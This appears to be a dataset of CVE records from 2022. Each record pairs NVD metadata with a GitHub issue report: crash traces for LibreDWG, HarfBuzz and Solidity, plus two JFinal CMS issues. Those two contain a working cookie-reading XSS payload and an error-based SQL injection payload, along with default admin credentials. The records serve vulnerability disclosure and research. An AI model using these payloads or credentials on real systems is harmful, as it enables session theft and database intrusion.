cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2022-33034
2022-06-23T17:15:14.270
LibreDWG v0.12.4.4608 was discovered to contain a stack overflow via the function copy_bytes at decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/494" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/494" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4608:*:*:*:*:*:*:*", "matchCriteriaId": "205AD0A5-0F64-4F38-A208-B41F8C1E8952", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/494
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==9543==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffc8f0 at pc 0x0000007257bb bp 0x7fffffffbc90 sp 0x7fffffffbc88 WRITE of size 1 at 0x7fffffffc8f0 thread T0 #0 0x7257ba in copy_bytes /testcase/libredwg/src/decode_r2007.c:228:12 #1 0x7257ba in decompress_r2007 /testcase/libredwg/src/decode_r2007.c:563 #2 0x712263 in read_file_header /testcase/libredwg/src/decode_r2007.c:1247:13 #3 0x712263 in read_r2007_meta_data /testcase/libredwg/src/decode_r2007.c:2354 #4 0x533116 in decode_R2007 /testcase/libredwg/src/decode.c:3231:11 #5 0x533116 in dwg_decode /testcase/libredwg/src/decode.c:212 #6 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #7 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #8 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) Address 0x7fffffffc8f0 is located in stack of thread T0 at offset 2736 in frame #0 0x71159f in read_r2007_meta_data /testcase/libredwg/src/decode_r2007.c:2338 This frame has 23 object(s): [32, 40) 'acis_sab_data.i.i' [64, 65) 'acis_empty.i.i' [80, 82) 'version1913.i.i' [96, 100) 'size1930.i.i' [112, 160) 'sec_dat.i548' [192, 240) 'sec_dat.i515' [272, 320) 'sec_dat.i492' [352, 400) 'sec_dat.i455' [432, 480) 'sec_dat.i424' [512, 560) 'sec_dat.i391' [592, 640) 'sec_dat.i356' [672, 720) 'sec_dat.i330' [752, 800) 'sec_dat.i301' [832, 836) 'size.i282' [848, 873) 'old_dat.sroa.0.i' [912, 960) 'sec_dat.i268' [992, 1040) 'sec_dat.i220' [1072, 1120) 'str.i' [1152, 1200) 'sec_dat.i' [1232, 1280) 'str_dat.i' [1312, 1320) 'ptr.i' [1344, 2328) 'data.i' [2464, 2736) 'file_header' <== Memory access at offset 2736 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /testcase/libredwg/src/decode_r2007.c:228:12 in copy_bytes Shadow bytes around the buggy address: 0x10007fff78c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff78d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff78e0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 0x10007fff78f0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 0x10007fff7900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3 0x10007fff7920: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==9543==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/copy_bytes_sof
stack-buffer-overflow exists in the function copy_bytes in decode_r2007.c
https://api.github.com/repos/LibreDWG/libredwg/issues/494/comments
3
2022-06-08T01:51:23Z
2022-12-15T08:47:23Z
https://github.com/LibreDWG/libredwg/issues/494
1,264,082,849
494
3,782
CVE-2022-33068
2022-06-23T17:15:14.350
An integer overflow in the component hb-ot-shape-fallback.cc of Harfbuzz v4.3.0 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/harfbuzz/harfbuzz/commit/62e803b36173fd096d7ad460dd1d1db9be542593" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/harfbuzz/harfbuzz/issues/3557" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FQBJ24W6TXLSAQWCFW7IBGUMX4AJI3S4/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQMEXOVDL3T2UXKBCON7JSOCE646G7HG/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W56WTC5IY4EIUHVUIHMCXA3BSBZLSZCI/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/harfbuzz/harfbuzz/commit/62e803b36173fd096d7ad460dd1d1db9be542593" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/harfbuzz/harfbuzz/issues/3557" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FQBJ24W6TXLSAQWCFW7IBGUMX4AJI3S4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQMEXOVDL3T2UXKBCON7JSOCE646G7HG/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W56WTC5IY4EIUHVUIHMCXA3BSBZLSZCI/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:harfbuzz_project:harfbuzz:4.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A67E5B9-F189-4A12-9BA2-D9135C21AD24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/harfbuzz/harfbuzz/issues/3557
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "harfbuzz", "harfbuzz" ]
##### **Describe the bug** UndefinedBehaviorSanitizer: signed integer overflow in hb-ot-shape-fallback.cc ##### **To Reproduce** Built harfbuzz-shape-fuzzer using clang-10 according to [the oss-fuzz script](https://github.com/google/oss-fuzz/blob/master/projects/harfbuzz/build.sh) with `CXXFLAGS='-O1 -fsanitize=address -fsanitize=array-bounds,bool,builtin,enum,float-divide-by-zero,function,integer-divide-by-zero,null,object-size,return,returns-nonnull-attribute,shift,signed-integer-overflow,unreachable,vla-bound,vptr'` commit: 7f7ebdc6bb73bc24d6aa51f2a2c6b214484f5ee4 ##### **UBSAN Output** ``` $ ./hb-shape-fuzzer id:000000,sig:06,src:014111,time:17042722,op:havoc,rep:2,trial:1 INFO: Seed: 3794760496 INFO: Loaded 1 modules (85057 inline 8-bit counters): 85057 [0x1066033, 0x107ac74), INFO: Loaded 1 PC tables (85057 PCs): 85057 [0x107ac78,0x11c7088), hb-shape-fuzzer: Running 1 inputs 1 time(s) each. Running: id:000000,sig:06,src:014111,time:17042722,op:havoc,rep:2,trial:1 harfbuzz/src/hb-ot-shape-fallback.cc:262:67: runtime error: signed integer overflow: 6 - -2147483648 cannot be represented in type 'int' SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior harfbuzz/src/hb-ot-shape-fallback.cc:262:67 in harfbuzz/src/hb-ot-shape-fallback.cc:279:45: runtime error: signed integer overflow: -2147483648 + -2147483648 cannot be represented in type 'int' SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior harfbuzz/src/hb-ot-shape-fallback.cc:279:45 in harfbuzz/src/hb-ot-shape-fallback.cc:279:67: runtime error: signed integer overflow: 0 - -2147483648 cannot be represented in type 'int' SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior harfbuzz/src/hb-ot-shape-fallback.cc:279:67 in Executed id:000000,sig:06,src:014111,time:17042722,op:havoc,rep:2,trial:1 in 4 ms ``` testcase: [harfbuzz-shape-fuzzer.zip](https://github.com/harfbuzz/harfbuzz/files/8591752/harfbuzz-shape-fuzzer.zip)
UndefinedBehaviorSanitizer: signed integer overflow
https://api.github.com/repos/harfbuzz/harfbuzz/issues/3557/comments
0
2022-04-29T15:03:57Z
2022-06-01T13:40:26Z
https://github.com/harfbuzz/harfbuzz/issues/3557
1,221,037,217
3,557
3,783
CVE-2022-33069
2022-06-23T17:15:14.390
Ethereum Solidity v0.8.14 contains an assertion failure via SMTEncoder::indexOrMemberAssignment() at SMTEncoder.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ethereum/solidity/issues/12973" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ethereum/solidity/issues/12973" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:soliditylang:solidity:0.8.13:*:*:*:*:*:*:*", "matchCriteriaId": "2404611E-1F7A-4574-A34B-D4BA13B45B19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:soliditylang:solidity:0.8.14:*:*:*:*:*:*:*", "matchCriteriaId": "4DBDBFD9-AEED-4DF3-90CA-8F6A049A936F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/ethereum/solidity/issues/12973
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ethereum", "solidity" ]
##### **Describe the bug** The attached testcase crashes the solidity compiler solc with an InternalCompilerError: Solidity assertion failed in in solidity::frontend::SMTEncoder::indexOrMemberAssignment https://github.com/ethereum/solidity/blob/b35cda5998ac7bc28a58f23480f2f82a440d6fa2/libsolidity/formal/SMTEncoder.cpp#L1596 ##### **To Reproduce** Built solc_ossfuzz using clang-10 according to [the oss-fuzz script](https://github.com/google/oss-fuzz/blob/master/projects/solidity/build.sh) with `CXXFLAGS='-O1 -fsanitize=address -fsanitize=array-bounds,bool,builtin,enum,float-divide-by-zero,function,integer-divide-by-zero,null,object-size,return,returns-nonnull-attribute,shift,signed-integer-overflow,unreachable,vla-bound,vptr'` commit: b35cda5998ac7bc28a58f23480f2f82a440d6fa2 ##### **Crash Output** ``` $ ./solc_ossfuzz id:000000,sig:06,src:012925,time:33170510,op:havoc,rep:2,trial:3 INFO: Seed: 2663119797 INFO: Loaded 1 modules (537599 inline 8-bit counters): 537599 [0x53258a0, 0x53a8c9f), INFO: Loaded 1 PC tables (537599 PCs): 537599 [0x53a8ca0,0x5bdcc90), solc_ossfuzz: Running 1 inputs 1 time(s) each. Running: id:000000,sig:06,src:012925,time:33170510,op:havoc,rep:2,trial:3 terminate called after throwing an instance of 'boost::wrapexcept<solidity::langutil::InternalCompilerError>' what(): Solidity assertion failed ==2678862== ERROR: libFuzzer: deadly signal #0 0x505691 in __sanitizer_print_stack_trace (solc_ossfuzz+0x505691) #1 0x55da28 in fuzzer::PrintStackTrace() (solc_ossfuzz+0x55da28) #2 0x542819 in fuzzer::Fuzzer::CrashCallback() (solc_ossfuzz+0x542819) #3 0x7ffff7c713bf (/lib/x86_64-linux-gnu/libpthread.so.0+0x143bf) #4 0x7ffff7a8103a in __libc_signal_restore_set /build/glibc-sMfBJT/glibc-2.31/signal/../sysdeps/unix/sysv/linux/internal-signals.h:86:3 #5 0x7ffff7a8103a in raise /build/glibc-sMfBJT/glibc-2.31/signal/../sysdeps/unix/sysv/linux/raise.c:48:3 #6 0x7ffff7a60858 in abort /build/glibc-sMfBJT/glibc-2.31/stdlib/abort.c:79:7 #7 0x7ffff7e6d910 (/lib/x86_64-linux-gnu/libstdc++.so.6+0x9e910) #8 0x7ffff7e7938b (/lib/x86_64-linux-gnu/libstdc++.so.6+0xaa38b) #9 0x7ffff7e793f6 in std::terminate() (/lib/x86_64-linux-gnu/libstdc++.so.6+0xaa3f6) #10 0x7ffff7e796a8 in __cxa_throw (/lib/x86_64-linux-gnu/libstdc++.so.6+0xaa6a8) #11 0x6407ae in void boost::throw_exception<solidity::langutil::InternalCompilerError>(solidity::langutil::InternalCompilerError const&) (solc_ossfuzz+0x6407ae) #12 0x181c97c in solidity::frontend::SMTEncoder::indexOrMemberAssignment(solidity::frontend::Expression const&, solidity::smtutil::Expression const&) (solc_ossfuzz+0x181c97c) #13 0x1809c94 in solidity::frontend::SMTEncoder::assignment(solidity::frontend::Expression const&, solidity::smtutil::Expression const&, solidity::frontend::Type const*) (solc_ossfuzz+0x1809c94) #14 0x17ffc41 in solidity::frontend::SMTEncoder::endVisit(solidity::frontend::Assignment const&) (solc_ossfuzz+0x17ffc41) #15 0x169761d in solidity::frontend::CHC::defineContractInitializer(solidity::frontend::ContractDefinition const&, solidity::frontend::ContractDefinition const&) (solc_ossfuzz+0x169761d) #16 0x168eca6 in solidity::frontend::CHC::endVisit(solidity::frontend::ContractDefinition const&) (solc_ossfuzz+0x168eca6) #17 0xe66f1a in void solidity::frontend::ASTNode::listAccept<std::shared_ptr<solidity::frontend::ASTNode> >(std::vector<std::shared_ptr<solidity::frontend::ASTNode>, std::allocator<std::shared_ptr<solidity::frontend::ASTNode> > > const&, solidity::frontend::ASTConstVisitor&) (solc_ossfuzz+0xe66f1a) #18 0xe66985 in solidity::frontend::SourceUnit::accept(solidity::frontend::ASTConstVisitor&) const (solc_ossfuzz+0xe66985) #19 0x167c1d9 in solidity::frontend::CHC::analyze(solidity::frontend::SourceUnit const&) (solc_ossfuzz+0x167c1d9) #20 0x178e5f3 in solidity::frontend::ModelChecker::analyze(solidity::frontend::SourceUnit const&) (solc_ossfuzz+0x178e5f3) #21 0x88c1f2 in solidity::frontend::CompilerStack::analyze() (solc_ossfuzz+0x88c1f2) #22 0x892357 in solidity::frontend::CompilerStack::compile(solidity::frontend::CompilerStack::State) (solc_ossfuzz+0x892357) #23 0x56b6d5 in FuzzerUtil::testCompiler(std::map<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::less<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >&, bool, unsigned int, bool, bool) (solc_ossfuzz+0x56b6d5) #24 0x562ddf in LLVMFuzzerTestOneInput (solc_ossfuzz+0x562ddf) #25 0x543f49 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (solc_ossfuzz+0x543f49) #26 0x52ee49 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (solc_ossfuzz+0x52ee49) #27 0x533d52 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (solc_ossfuzz+0x533d52) #28 0x52ebd2 in main (solc_ossfuzz+0x52ebd2) #29 0x7ffff7a620b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16 #30 0x48440d in _start (solc_ossfuzz+0x48440d) NOTE: libFuzzer has rudimentary signal handlers. Combine libFuzzer with AddressSanitizer or similar for better crash reports. SUMMARY: libFuzzer: deadly signal ``` zipped testcase to reproduce: [id:000000,sig:06,src:012925,time:33170510,op:havoc,rep:2,trial:3.zip](https://github.com/ethereum/solidity/files/8592187/id.000000.sig.06.src.012925.time.33170510.op.havoc.rep.2.trial.3.zip)
[SMTChecker] ICE in `SMTEncoder::indexOrMemberAssignment()` with public state variable with invalid double initialization
https://api.github.com/repos/ethereum/solidity/issues/12973/comments
2
2022-04-29T16:12:49Z
2022-11-29T10:58:37Z
https://github.com/ethereum/solidity/issues/12973
1,221,177,514
12,973
3,784
CVE-2022-33113
2022-06-23T17:15:14.793
Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the keyword text field under the publish blog module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/39" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/39" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jflyfox/jfinal_cms/issues/39
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
There is a stored XSS vulnerability in JFinal_cms 's publish blog module. An attacker can insert malicious XSS code into the keyword field. When the user views the content of the article in the foreground, the malicious XSS code is triggered successfully. payload: `" onmouseover="alert(document.cookie)` <img width="1337" alt="image-20220610223449296" src="https://user-images.githubusercontent.com/30547070/173092484-110b2779-da29-49a1-bc3b-f486bd3c11bc.png"> Successfully executed malicious XSS code: <img width="1424" alt="image-20220610223306205" src="https://user-images.githubusercontent.com/30547070/173092624-5519d82e-2fb0-4a8e-b750-b507a89e8598.png">
XSS vulnerability stored in the publish blog module of Jfinal_cms V5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/39/comments
1
2022-06-10T14:54:45Z
2022-07-11T10:09:49Z
https://github.com/jflyfox/jfinal_cms/issues/39
1,267,664,722
39
3,785
CVE-2022-33114
2022-06-23T17:15:14.833
Jfinal CMS v5.1.0 was discovered to contain a SQL injection vulnerability via the attrVal parameter at /jfinal_cms/system/dict/list.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/38" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jflyfox/jfinal_cms/issues/38
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
# Vulnerability Analysis The vulnerability appears in lines 23-28 of the **com.jflyfox.system.dict.DictController.java** <img width="951" alt="image-20220610104610536" src="https://user-images.githubusercontent.com/30547070/172980296-78159fe2-2e0d-4e2c-aae3-cf1bd3095253.png"> <img width="1079" alt="image-20220610104555090" src="https://user-images.githubusercontent.com/30547070/172980256-a2433c55-8193-4748-a3e4-2abccb2ba7d9.png"> The **attrVal** parameter is the **attr.dict_type** parameter passed from the front end So you can construct payload to exploit this vulnerability # Exploit Maven Startup Environment Vulnerability address: /jfinal_cms/system/dict/list Administrator login is required. The default account password is admin:admin123 <img width="1304" alt="image-20220610103807418" src="https://user-images.githubusercontent.com/30547070/172980313-8d1fdc16-eecf-4b91-bb81-d6d9a34ed095.png"> Injection parameters: **attr.dict_type** payload:`' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+` <img width="1374" alt="image-20220610103651342" src="https://user-images.githubusercontent.com/30547070/172980327-99e6666f-2ca4-4f32-b10b-f86435f0306e.png"> Sqlmap: <img width="1421" 